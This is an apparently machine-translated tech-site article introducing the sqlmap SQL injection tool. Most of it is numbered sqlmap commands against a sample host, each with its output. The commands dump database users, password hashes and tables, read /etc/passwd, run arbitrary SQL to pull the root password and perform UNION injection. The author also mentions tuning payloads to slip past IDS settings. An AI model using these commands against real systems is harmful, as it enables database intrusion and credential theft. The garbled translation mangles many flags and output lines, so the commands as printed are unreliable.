What is SqlMap injection 01/15 Update SLTechnology News&Howtos

What is SqlMap injection

2025-01-15 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Servers >

Shulou(Shulou.com)06/01 Report--

This article shows you what is SqlMap injection, the content is concise and easy to understand, can definitely brighten your eyes, through the detailed introduction of this article, I hope you can get something.

From the black defense, we can see that there are some internal tools, foreign injection tools, python's. If you want to download it, it turns out to be a vip tool. I searched from Baidu and found nothing. It seems that it is not popular in China. I went straight to google to search. And found this tool. It's very powerful.

My previous idea, this tool has all come true. And more powerful. A powerful tool for a new generation. I don't have time to analyze it. Interested friends can do some research.

Open source and powerful tools. Try not to talk about it.

Support almost all the databases now, which is stronger than any tool in China. I began to wonder if the pangolin originated from it. Get,post and cookie injection are supported. You can add cookie and user-agent to support blind injection, error echo injection, and many other injection methods. Support agents, optimize algorithms, more efficient. Fingerprint identification technology judgment database

Here are the instructions.

I couldn't help it last night, so I saw some of it and tested it. The sql statement in it is too simple, but you can customize it. Change it to a richer statement. To bypass injection testing and other IDS settings. Later, I'll compile a dos version for you.

1. Install python2.5 first.

2. Then go to the directory of sqlmap and execute sqlmap

Detailed usage

1. Sqlmap-u injection point

2. Sqlmap-g "keywords" / / this is injected through google search, but not yet. I don't know what the reason is. It can be directly modified to Baidu.

3. Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-v 1

[hh:mm:25] [INFO] testing if the url is stable Wait a few seconds [hh:mm:26] [INFO] url is stable [hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic [hh:mm:26] [INFO] confirming that GET parameter' id' is dynamic [hh:mm:26] [INFO] GET parameter 'id' is dynamic [hh:mm:26] [INFO] testing sql injection on GET parameter' id' [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id' [hh:mm:26] [INFO] GET parameter' id' is numeric/unescaped injectable [hh:mm:26] [INFO] testing MySQL [hh:mm:26] [INFO] query: CONCAT ('5' '5') [hh:mm:26] [INFO] retrieved: 55 [hh:mm:26] [INFO] performed 20 queries in 0 seconds [hh:mm:26] [INFO] confirming MySQL [hh:mm:26] [INFO] query: LENGTH (' 5') [hh:mm:26] [INFO] retrieved: 1 [hh:mm:26] [INFO] performed 13 queries in 0 seconds [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0 1 [hh:mm:26] [INFO] retrieved: 5 [hh:mm:26] [INFO] performed 13 queries in 0 seconds remote DBMS: MySQL > = 5.0.0

4. Specify parameter injection

Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-v 1-p" id "

[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds [hh:mm:18] [INFO] url is stable [hh:mm:18] [INFO] testing sql injection on parameter 'id' [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter' id' [hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id' [hh:mm:18] [INFO] parameter' id' is numeric/unescaped injectable [...]

Or if you want to provide more than one parameter, for instance:

$python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-v 1-p" cat,id "

5. Specify the method and post data python sqlmap.py-u "http://192.168.1.47/page.php"-- method" POST "--data" id=1&cat=2 "

6. Specify cookie, and you can inject some addresses that need to be logged in, python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-- cookie" COOKIE_VALUE "

7. Inject python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-- proxy" http://127.0.0.1:8118" through the agent

8. Specify keywords or not. The program will automatically judge python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-- string" STRING_ON_TRUE_PAGE based on the hash of the returned result.

9. Specify the data so that you don't have to guess other databases. It can improve efficiency. -- remote-dbms

10. Fingerprint discrimination database type python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-v 1-f 11, obtain banner information python sqlmap.py-u" http://192.168.1.47/page.php?id=1&cat=2"-b

Banner: '5.0.38 color Ubuntups 0ubuntu 1.1 color log'

12. Get the current database, current users, all users, passwords, all available databases. Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-- current-db

Current database: 'testdb'

Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-- users

Database management system users [5]: [*] 'debian-sys-maint'@'localhost' [*]' root'@'127.0.0.1' [*] 'root'@'leboyer' [*]' root'@'localhost' [*] 'testuser'@'localhost'

Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-- passwords

Database management system users password hashes: [*] debian-sys-maint [1]: password hash: * XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX [*] root [1]: password hash: * YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY [*] testuser [1]: password hash: * ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ

Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-- dbs

Available databases [3]: [*] information_schema [*] mysql [*] testdb

Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-- tables-D" information_schema "

Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-- columns-T" user "- D" mysql "

13. Displays the specified file content, which is generally used for php python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-- file / etc/passwd

/ etc/passwd:-root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6 : 12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x : 33:33:www-data:/var/www:/bin/false backup:x:34:34:backup:/var/backups:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh mysql:x:104:105:MySQL Server ,: / var/lib/mysql:/bin/false postgres:x:105:107:PostgreSQL administrator,:/var/lib/postgresql:/ bin/bash inquis:x:1000:100:Bernardo Damele,:/home/inquis:/bin/bash--

Execute your own sql statement.

Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-v 1-e" SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0,1 "

[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user =' root' LIMIT 0,1'[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0,1 [hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY [hh:mm:19] [INFO] performed 118 queries in 0 seconds SELECT password FROM mysql.user WHERE user =' root' LIMIT 0,1: 'YYYYYYYYYYYYYYYY'

15. Union is injected into python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-- union- check.

Valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT NULL, NULL, NULL--&cat=2'

Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-v 1-- union-use-- banner

[...] [hh:mm:24] [INFO] testing inband sql injection on parameter 'id' [hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability [hh:mm:24] [INFO] confirming inband sql injection on parameter' id' [...] [hh:mm:24] [INFO] fetching banner [hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL SELECT CONCAT (CHAR), VERSION (), CHAR (CHAR), NULL, NULL--&cat=2 [hh:mm:24] [INFO] performed 1 queries in 0 seconds banner: '5.0.38 Ubunture0ubuntu1.1'

16, save the injection process to a file, but also restore the injection process from the file, very convenient, a major feature. You can interrupt during the injection and continue when you have time. Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-v 1-b-o" sqlmap.log "

[...] [hh:mm:09] [INFO] fetching banner [hh:mm:09] [INFO] query: VERSION () [hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log [hh:mm:11] [INFO] performed 139 queries in 1 seconds banner: '5.0.38 Ubuntu 0ubuntu 1.1 log'

Python sqlmap.py-u "http://192.168.1.47/page.php?id=1&cat=2"-v 1-- banner-o" sqlmap.log "--resume

[...] [hh:mm:13] [INFO] fetching banner [hh:mm:13] [INFO] query: VERSION () [hh:mm:13] [INFO] retrieved the length of query: 26 [hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb [hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log banner:

What is SqlMap injection above? have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.